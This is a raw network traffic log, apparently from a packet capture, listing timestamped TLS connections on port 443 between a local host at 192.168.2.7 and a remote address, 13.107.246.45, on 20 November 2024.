                                                                                                                                                                                                Nov 20, 2024 10:54:39.280328035 CET4434985013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.283657074 CET4434984913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.284015894 CET49849443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.284040928 CET4434984913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.284399033 CET49849443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.284404039 CET4434984913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.313685894 CET4434985113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.314291000 CET49851443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.314306974 CET4434985113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.314831972 CET49851443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.314836025 CET4434985113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.328979015 CET49847443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.328995943 CET4434984713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.379997969 CET4434985013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.380300999 CET4434985013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.380357981 CET4434985013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.380372047 CET49850443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.380419970 CET49850443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.380486965 CET49850443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.380498886 CET4434985013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.380516052 CET49850443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.380522966 CET4434985013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.383337975 CET49854443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.383373022 CET4434985413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.383460045 CET49854443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.383636951 CET49854443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.383656025 CET4434985413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.386087894 CET4434984913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.386159897 CET4434984913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.386298895 CET49849443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.386323929 CET49849443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.386323929 CET49849443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.386338949 CET4434984913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.386348963 CET4434984913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.388597965 CET49855443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.388633966 CET4434985513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.388709068 CET49855443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.388881922 CET49855443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.388897896 CET4434985513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.415846109 CET4434985113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.416325092 CET4434985113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.416481018 CET49851443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.416532040 CET49851443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.416548014 CET4434985113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.416558981 CET49851443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.416563988 CET4434985113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.419655085 CET49856443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.419687986 CET4434985613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.419760942 CET49856443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.419923067 CET49856443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.419939041 CET4434985613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.696165085 CET4434985213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.697082996 CET49852443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.697104931 CET4434985213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.697489023 CET49852443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.697494984 CET4434985213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.753822088 CET4434985313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.754453897 CET49853443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.754488945 CET4434985313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.754911900 CET49853443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.754919052 CET4434985313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.833820105 CET4434985213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.834202051 CET4434985213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.834357023 CET49852443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.834357023 CET49852443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.834357023 CET49852443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.836982012 CET49857443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.837033987 CET4434985713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.837228060 CET49857443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.837433100 CET49857443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.837451935 CET4434985713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.855657101 CET4434985313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.856053114 CET4434985313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.856110096 CET49853443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.856153965 CET49853443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.856168985 CET4434985313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.856184959 CET49853443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.856189966 CET4434985313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.858906031 CET49858443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.858933926 CET4434985813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.859015942 CET49858443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.859184980 CET49858443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.859199047 CET4434985813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.019386053 CET4434985413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.019994974 CET49854443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.020010948 CET4434985413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.020448923 CET49854443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.020457029 CET4434985413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.053452969 CET4434985513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.054039001 CET49855443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.054063082 CET4434985513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.054477930 CET49855443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.054485083 CET4434985513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.065362930 CET4434985613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.065859079 CET49856443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.065879107 CET4434985613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.066392899 CET49856443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.066400051 CET4434985613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.119302034 CET4434985413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.119632006 CET4434985413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.119685888 CET49854443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.119699955 CET4434985413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.119716883 CET4434985413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.119769096 CET49854443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.119905949 CET49854443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.119930983 CET4434985413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.119939089 CET49854443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.119944096 CET4434985413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.124484062 CET49859443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.124509096 CET4434985913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.124586105 CET49859443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.124892950 CET49859443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.124907970 CET4434985913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.141391993 CET49852443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.141411066 CET4434985213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.161330938 CET4434985513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.161397934 CET4434985513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.161442041 CET49855443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.163760900 CET49855443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.163779974 CET4434985513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.163793087 CET49855443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.163799047 CET4434985513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.171233892 CET49860443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.171263933 CET4434986013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.171329021 CET49860443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.171726942 CET49860443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.171741009 CET4434986013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.173476934 CET4434985613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.173551083 CET4434985613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.173609972 CET49856443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.173625946 CET4434985613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.173706055 CET4434985613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.173748970 CET49856443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.173993111 CET49856443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.174002886 CET4434985613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.174011946 CET49856443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.174016953 CET4434985613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.203154087 CET49861443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.203207016 CET4434986113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.203491926 CET49861443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.203795910 CET49861443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.203821898 CET4434986113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.473978996 CET4434985713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.474488020 CET49857443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.474498034 CET4434985713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.474925995 CET49857443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.474931002 CET4434985713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.489233971 CET4434985813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.491286039 CET49858443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.491307974 CET4434985813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.496112108 CET49858443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.496125937 CET4434985813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.575668097 CET4434985713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.575937986 CET4434985713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.576111078 CET49857443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.576596022 CET49857443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.576608896 CET4434985713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.576622009 CET49857443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.576627016 CET4434985713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.590689898 CET4434985813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.591042042 CET4434985813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.591188908 CET49858443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.690108061 CET49858443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.690108061 CET49858443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.690133095 CET4434985813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.690145016 CET4434985813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.773729086 CET4434985913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.789398909 CET49859443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.789410114 CET4434985913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.812189102 CET49859443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.812196016 CET4434985913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.828531027 CET49862443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.828582048 CET4434986213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.828663111 CET49862443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.828826904 CET49862443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.828835011 CET4434986213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.831127882 CET49863443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.831173897 CET4434986313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.831237078 CET49863443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.831784964 CET49863443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.831804037 CET4434986313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.841945887 CET4434986013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.842637062 CET49860443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.842645884 CET4434986013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.845762014 CET49860443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.845767975 CET4434986013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.877451897 CET4434986113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.885620117 CET49861443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.885637045 CET4434986113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.889604092 CET49861443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.889609098 CET4434986113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.910803080 CET4434985913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.911267042 CET4434985913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.911432028 CET49859443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.911432028 CET49859443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.912244081 CET49859443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.912256956 CET4434985913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.914294958 CET49864443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.914338112 CET4434986413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.914402962 CET49864443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.914936066 CET49864443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.914947033 CET4434986413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.946299076 CET4434986013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.946804047 CET4434986013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.946994066 CET49860443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.946994066 CET49860443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.946994066 CET49860443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.949409962 CET49865443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.949438095 CET4434986513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.949522018 CET49865443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.949676037 CET49865443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.949687958 CET4434986513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.988702059 CET4434986113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.988957882 CET4434986113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.989095926 CET49861443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.989178896 CET49861443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.989178896 CET49861443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.989197016 CET4434986113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.989204884 CET4434986113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.991688967 CET49866443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.991724968 CET4434986613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:40.991791010 CET49866443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.991931915 CET49866443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:40.991945982 CET4434986613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.172642946 CET49860443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.172662020 CET4434986013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.474046946 CET4434986213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.474623919 CET49862443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.474633932 CET4434986213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.475075960 CET49862443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.475080013 CET4434986213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.659394026 CET4434986313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.660486937 CET4434986513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.660737991 CET49863443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.660753012 CET4434986313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.661303997 CET49863443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.661324024 CET4434986313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.661529064 CET4434986413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.661724091 CET49865443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.661739111 CET4434986513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.661984921 CET49864443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.661993027 CET4434986413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.662194967 CET49865443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.662199974 CET4434986513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.662729025 CET49864443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.662734032 CET4434986413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.754462957 CET4434986213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.754829884 CET4434986213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.754873037 CET49862443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.755858898 CET49862443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.755875111 CET4434986213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.759269953 CET49867443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.759370089 CET4434986713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.759462118 CET49867443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.759586096 CET49867443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.759613991 CET4434986713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.765115976 CET4434986413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.765654087 CET4434986413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.765701056 CET49864443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.765710115 CET4434986413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.765755892 CET49864443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.765971899 CET49864443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.765984058 CET4434986413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.765994072 CET49864443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.765997887 CET4434986413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.767846107 CET4434986513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.768184900 CET4434986513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.768244982 CET49865443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.768285990 CET49865443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.768294096 CET4434986513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.768305063 CET49865443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.768309116 CET4434986513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.770590067 CET4434986313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.771122932 CET4434986313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.771234035 CET49863443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.771266937 CET49868443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.771298885 CET4434986813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.771354914 CET49868443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.771531105 CET49863443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.771531105 CET49863443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.771559954 CET4434986313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.771589994 CET4434986313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.774317026 CET49869443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.774348021 CET4434986913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.774405003 CET49869443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.774513006 CET49869443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.774524927 CET4434986913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.775239944 CET49868443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.775252104 CET4434986813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:41.776395082 CET49870443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:41.776406050 CET4434987013.107.246.45192.168.2.7
